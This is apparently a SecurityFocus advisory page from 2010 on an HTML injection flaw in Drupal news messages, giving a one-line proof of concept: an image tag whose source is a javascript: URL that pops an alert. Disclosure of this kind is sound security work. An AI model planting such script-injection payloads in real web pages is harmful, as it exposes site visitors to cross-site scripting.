info
discussion
exploit
solution
references
Drupal News Message HTML Injection Vulnerability
The following proof of concept was submitted.
<IMG SRC="javascript:alert('unsecure')">
Privacy Statement
Copyright 2010, SecurityFocus
